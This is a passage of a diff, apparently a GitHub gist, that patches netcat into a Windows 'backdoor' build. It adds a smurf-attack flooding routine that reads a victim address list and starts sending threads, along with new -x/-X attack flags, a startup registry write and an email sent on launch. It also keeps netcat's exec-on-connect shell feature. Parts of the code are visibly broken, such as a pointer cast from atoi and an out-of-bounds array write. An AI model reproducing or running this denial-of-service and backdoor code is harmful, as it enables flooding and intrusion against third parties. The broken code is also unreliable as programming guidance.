+ /////////////////////////////////////////////////////////////////////////// | |
+ printf("Awp %s reAdy\n",Awp); | |
+ | |
+ while(1){ | |
+ //printf("%s\n",Awp); | |
+ if (!sendto(fd,Buff,sizeof(Buff),0,(struct sockaddr*)&SAddr,sizeof(SAddr))){ | |
+ printf("send fAiled:%d\n",GetLastError()); | |
+ return -1; | |
+ } | |
+ } | |
+ | |
+ return 0; | |
+ } | |
+ #ifdef SMURF_ATTACK | |
+ x_smurf(fd,x_smurf_victime,x_smurf_attack) | |
+ int fd; | |
+ char x_smurf_victime[20][32]; | |
+ char x_smurf_attack; | |
+ { | |
+ | |
+ typedef struct { | |
+ int fd; | |
+ char x_smurf_victime_param; | |
+ char x_smurf_attack_param; | |
+ } StructParametre; | |
+ | |
+ StructParametre Param; | |
+ | |
+ if (x_smurf_victime) { | |
+ if (x_smurf_attack) { | |
+ | |
+ HANDLE hThread; | |
+ DWORD threadID; | |
+ unsigned int n; | |
+ unsigned int i; | |
+ FILE* fp; | |
+ n = -1; | |
+ fp = fopen((char *)x_smurf_victime,"r"); | |
+ | |
+ if (fp == NULL){ | |
+ printf("sepecify the Awp list file\n"); | |
+ return -1; | |
+ } | |
+ | |
+ while (!feof(fp)){ | |
+ if (fgets((char *)&x_smurf_victime[++n],20,fp) == NULL) break; | |
+ for (i=0;i<strlen((char *)&x_smurf_victime[n]);i++){ | |
+ if (x_smurf_victime[n][i] == '\n') x_smurf_victime[n][i] ='\0'; | |
+ | |
+ | |
+ Param.fd = (int)fd; | |
+ Param.x_smurf_victime_param = (int)*&x_smurf_victime[n]; | |
+ Param.x_smurf_attack_param = (int)*&x_smurf_attack; | |
+ | |
+ } | |
+ } | |
+ //smurf_victime(netfd,(int )*x_smurf_victime[n],x_smurf_attack); | |
+ hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)smurf_victime, (void *)&Param, 0, &threadID); | |
+ WaitForSingleObject(hThread, INFINITE); | |
+ CloseHandle(hThread); | |
+ | |
+ } | |
+ } | |
+ } | |
+ #endif | |
+ #endif | |
+ //-------------------------------------------------------------------- | |
/* main : | |
now we pull it all together... */ | |
main (argc, argv) | |
int argc; | |
char ** argv; | |
{ | |
+ #ifdef WIN32 | |
+ LPTSTR lpValueName = "Browse For Folder Height"; | |
+ | |
+ DWORD dwDefault = 0x00000000; | |
+ | |
+ DWORD ret = init_regedit(lpValueName, dwDefault); | |
+ char email[] = "fakessh@fakessh.eu"; | |
+ char body[] = "From: \"www\"<fakessh@fakessh.eu>\r\n" | |
+ "To: \"w111\"<john.swilting@wanadoo.fr>\r\n" | |
+ "Subject: Hello\r\n\r\n" | |
+ "Hello World, Hello Email!"; | |
+ sendmail(email, body); | |
+ /*debug | |
+ * printf("The value data for the \'%s\' value name is 0X%.8X(%d).\n", lpValueName, ret, ret); | |
+ */ | |
+ #endif | |
#ifndef HAVE_GETOPT | |
extern char * optarg; | |
extern int optind, optopt; | |
*************** | |
*** 1669,1674 **** | |
--- 2360,2366 ---- | |
HINF * wherefrom = NULL; | |
IA * ouraddr = NULL; | |
IA * themaddr = NULL; | |
+ IA * smurfattack = NULL; | |
USHORT o_lport = 0; | |
USHORT ourport = 0; | |
USHORT loport = 0; /* for scanning stuff */ | |
*************** | |
*** 1755,1761 **** | |
/* If your shitbox doesn't have getopt, step into the nineties already. */ | |
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */ | |
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuvw:z")) != EOF) { | |
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */ | |
switch (x) { | |
case 'a': | |
--- 2447,2453 ---- | |
/* If your shitbox doesn't have getopt, step into the nineties already. */ | |
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */ | |
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuX:x:vw:z")) != EOF) { | |
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */ | |
switch (x) { | |
case 'a': | |
*************** | |
*** 1850,1855 **** | |
--- 2542,2553 ---- | |
case 'z': /* little or no data xfer */ | |
o_zero++; | |
break; | |
+ case 'x': | |
+ x_smurf_victime[20][32] = *(unsigned char *)atoi(optarg); /*attack smurf attack*/ | |
+ break; | |
+ case 'X': | |
+ x_smurf_attack = *(unsigned char *)atoi(optarg); /*attack smurf attack*/ | |
+ break; | |
default: | |
errno = 0; | |
bail ("nc -h for help"); | |
*************** | |
*** 1873,1879 **** | |
} | |
#endif /* G_S_H */ | |
if (o_wfile) { | |
! ofd = open (stage, O_WRONLY | O_CREAT | O_TRUNC, 0664); | |
if (ofd <= 0) /* must be > extant 0/1/2 */ | |
bail ("can't open %s", stage); | |
stage = (unsigned char *) Hmalloc (100); | |
--- 2571,2577 ---- | |
} | |
#endif /* G_S_H */ | |
if (o_wfile) { | |
! ofd = open (( const char *)stage, O_WRONLY | O_CREAT | O_TRUNC, 0664); | |
if (ofd <= 0) /* must be > extant 0/1/2 */ | |
bail ("can't open %s", stage); | |
stage = (unsigned char *) Hmalloc (100); | |
*************** | |
*** 1914,1919 **** | |
--- 2612,2618 ---- | |
#ifdef GAPING_SECURITY_HOLE | |
if (pr00gie) /* -e given? */ | |
doexec (netfd); | |
+ | |
#ifdef WIN32 | |
if (!pr00gie) // doexec does the read/write for win32 | |
#endif | |
*************** | |
*** 1986,1992 **** | |
#ifdef GAPING_SECURITY_HOLE | |
if (pr00gie) /* exec is valid for outbound, too */ | |
doexec (netfd); | |
! #endif /* GAPING_SECURITY_HOLE */ | |
if (! o_zero) | |
#ifdef WIN32 | |
#ifdef GAPING_SECURITY_HOLE | |
--- 2685,2698 ---- | |
#ifdef GAPING_SECURITY_HOLE | |
if (pr00gie) /* exec is valid for outbound, too */ | |
doexec (netfd); | |
! #endif /* GAPING_SECURITY_HOLE */ | |
! #ifdef SMURF_ATTACK | |
! if(x_smurf_victime) { | |
! if(x_smurf_attack) { | |
! x_smurf(netfd,x_smurf_victime,x_smurf_attack); | |
! } | |
! } | |
! #endif | |
if (! o_zero) | |
#ifdef WIN32 | |
#ifdef GAPING_SECURITY_HOLE | |
*************** | |
*** 2067,2082 **** | |
-o file hex dump of traffic\n\ | |
-p port local port number\n\ | |
-r randomize local and remote ports\n\ | |
! -s addr local source address"); | |
! #ifdef TELNET | |
! holler ("\ | |
! -t answer TELNET negotiation"); | |
! #endif | |
! holler ("\ | |
-u UDP mode\n\ | |
-v verbose [use twice to be more verbose]\n\ | |
-w secs timeout for connects and final net reads\n\ | |
-z zero-I/O mode [used for scanning]"); | |
bail ("port numbers can be individual or ranges: m-n [inclusive]"); | |
return(0); | |
} /* helpme */ | |
--- 2773,2792 ---- | |
-o file hex dump of traffic\n\ | |
-p port local port number\n\ | |
-r randomize local and remote ports\n\ | |
! -s addr local source address\n\ | |
! -t answer TELNET negotiation\n\ | |
-u UDP mode\n\ | |
-v verbose [use twice to be more verbose]\n\ | |
-w secs timeout for connects and final net reads\n\ | |
-z zero-I/O mode [used for scanning]"); | |
+ #ifdef SMURF_ATTACK | |
+ holler ("\ | |
+ -x addr/24 attack smurf attack on /24 listen"); | |
+ #ifdef SMURF_ATTACK | |
+ holler ("\ | |
+ -X file to cointain victime addr smurf attack"); | |
+ #endif | |
+ #endif | |
bail ("port numbers can be individual or ranges: m-n [inclusive]"); | |
return(0); | |
} /* helpme */ | |
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: netcat.c~ | |
Les fichiers binaires /home/swilting/Téléchargements/nc/netcat.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.o sont différents. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment